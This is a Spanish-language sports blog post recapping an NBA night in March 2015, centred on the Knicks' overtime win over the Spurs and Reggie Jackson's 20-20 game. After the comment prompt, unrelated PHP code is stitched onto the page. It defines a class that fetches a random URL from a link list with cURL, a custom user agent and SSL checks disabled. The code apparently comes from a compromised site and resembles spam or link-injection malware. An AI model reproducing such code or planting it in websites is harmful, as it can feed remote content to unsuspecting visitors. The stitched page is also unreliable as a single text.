La Crónica: A ti también te puede pasar

18 de March de 2015 por MagicJohnson32

No abundan los días en los que tenemos la ocasión de abrir con victoria de los Knicks, así que mejor aprovechamos la oportunidad. Por otra parte, un 20-20 de un jugador al que hace nada criticábamos también merece unas cuantas líneas. Ambas historias se repartirán el protagonismo en nuestra crónica, y además guardaremos espacio para que no os perdáis nada de lo que ha sido la jornada.

spurs_nyk

San Antonio Spurs 100 – NY Knicks 104 (OT)

Le puede pasar a cualquiera. Uno va al Madison para jugar contra unos Knicks que tienen a Bargnani y Shved como mejores hombres, y claro, parece que bastará con presentarse para ganar el partido. Y más si ese “uno” son los actuales campeones. Nada hacía presagiar un encuentro siquiera igualado entre Spurs y Knicks, dado que los neoyorquinos habitan en la última posición de los standings desde hace meses y los texanos llevaban unos cuantos partidos con el chip de los Playoffs encendido. Pero como el baloncesto es una actividad humana, y los humanos tenemos estas cosas, llegaron los Spurs al Madison y perdieron. No es que los Knicks fuesen un vendaval, y para que la victoria cayese del lado local tuvieron que suceder cosas como career highs de Galloway en puntos (22) y de Amundson en rebotes (17). Más significativas aún de lo que fue el partido resultaron las dos jugadas clave: Lou Amundson forzó la prórroga con una canasta a 5 segundos para el final y Shved selló la victoria robándole un balón a Tim Duncan. Dice Elias Sports Bureau que jamás el campeón vigente había perdido a estas alturas de la temporada contra un equipo con menos de un 20% de victorias. Le puede pasar a cualquier, cierto, pero no quisiera yo tener que haber lidiado con la furia de Gregg Popovich anoche a la conclusión del partido.

Memphis Grizzlies 95 – Detroit Pistons 105

Hace apenas unas horas calificábamos de fracaso la llegada de Reggie Jackson a los Pistons y su papel de base en los esquemas de Stan Van Gundy. Tal vez debamos reservar el veredicto un par de semanas más tras la actuación de Jackson anoche, un 20-20 (23 puntos y 20 asistencias) ante nada menos que el segundo clasificado del Oeste. El ex de los Thunder sostuvo a los Pistons en la primera mitad ante unos Grizzlies muy superiores que, ante la baja de Monroe, dominaban la pintura a placer y llegaron al descanso 15 arriba. En la reanudación, cuando Memphis bajó la intensidad, Jackson dirigió la remontada y consiguiente victoria local, con la que se cierra una racha de 10 derrotas seguidas, posiblemente demasiado tarde para reengancharse a la lucha por los Playoffs pero a tiempo de mirar con esperanza la próxima temporada.

Resto de la jornada

Anoche se produjo la reedición del reciente duelo futurista entre Anthony Davis y Giannis Antetokounmpo. En lo individual, ambos dejaron nuevamente muestras de su talento infinito y en lo colectivo los Pelicans volvieron a llevarse un encuentro muy igualado (84-85). Ilyasova falló el triple que pudo dar la victoria a los Bucks y los Pelicans regresan a posiciones de Playoffs. Los Hornets no aprovecharon su oportunidad y, aunque estuvieron a punto de remontar 22 puntos a los Clippers, cedieron frente a un buen Griffin (92-99) y caen un partido por detrás del triple empate que presentan ahora mismo Pacers, Heat y Celtics. Y en Houston, a falta de un Harden más entonado, Motiejunas se alzó como el mejor de los Rockets en la victoria sobre los Magic (94-107).

PREMIOS

MVP: Sin duda, Reggie Jackson. Sólo ha necesitado que le criticásemos para responder y de qué manera. 23 puntos (10 de 18 en tiros de campo) y 20 asistencias para liderar la remontada de los Pistons contra los Grizzlies.

Rookie: Siempre muy completo en sus actuaciones, Elfrid Payton logró 10 puntos, 4 rebotes, 7 asistencias, 2 robos y 1 tapón ante un rival complicadísimo como es Patrick Beverley.

Sorpresa: En medio de la lamentable campaña de los Knicks, dos jugadores europeos que dábamos casi por perdidos para la NBA se están reivindicando. Bargnani y Shved son de lo poco digno en este tramo final de la peor temporada que se recuerda por el Madison y anoche comandaron una de las grandes sorpresas de la temporada. Sus respectivas aportaciones: 16 puntos, 10 rebotes, 3 tapones y 2 asistencias del italiano y 21 puntos, 7 asistencias, 3 rebotes y 3 robos del ruso.

Decepción: Un borrón en una temporada excelente por parte de Khris Middleton, negado anoche en New Orleans. Falló 12 de sus 14 lanzamientos y se quedó en 4 puntos, con 4 rebotes, 2 asistencias y 4 pérdidas de balón. No importa, Khris, seguimos siendo muy fans.

Mayor esfuerzo en vano: Entre Antetokounmpo y Oladipo andaría la mejor actuación individual de un equipo perdedor. El griego anotó 15 puntos con 6 de 9 en tiros, además de sumar 9 rebotes, 5 asistencias y 3 tapones. El de los Magic se fue hasta los 29 puntos, 4 rebotes, 3 asistencias y 4 robos. Para él el premio.

TOP 5

Imágenes | AP Photos / Getty Images

Esta entrada no tiene comentarios... pero tú puedes ser el primero.

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>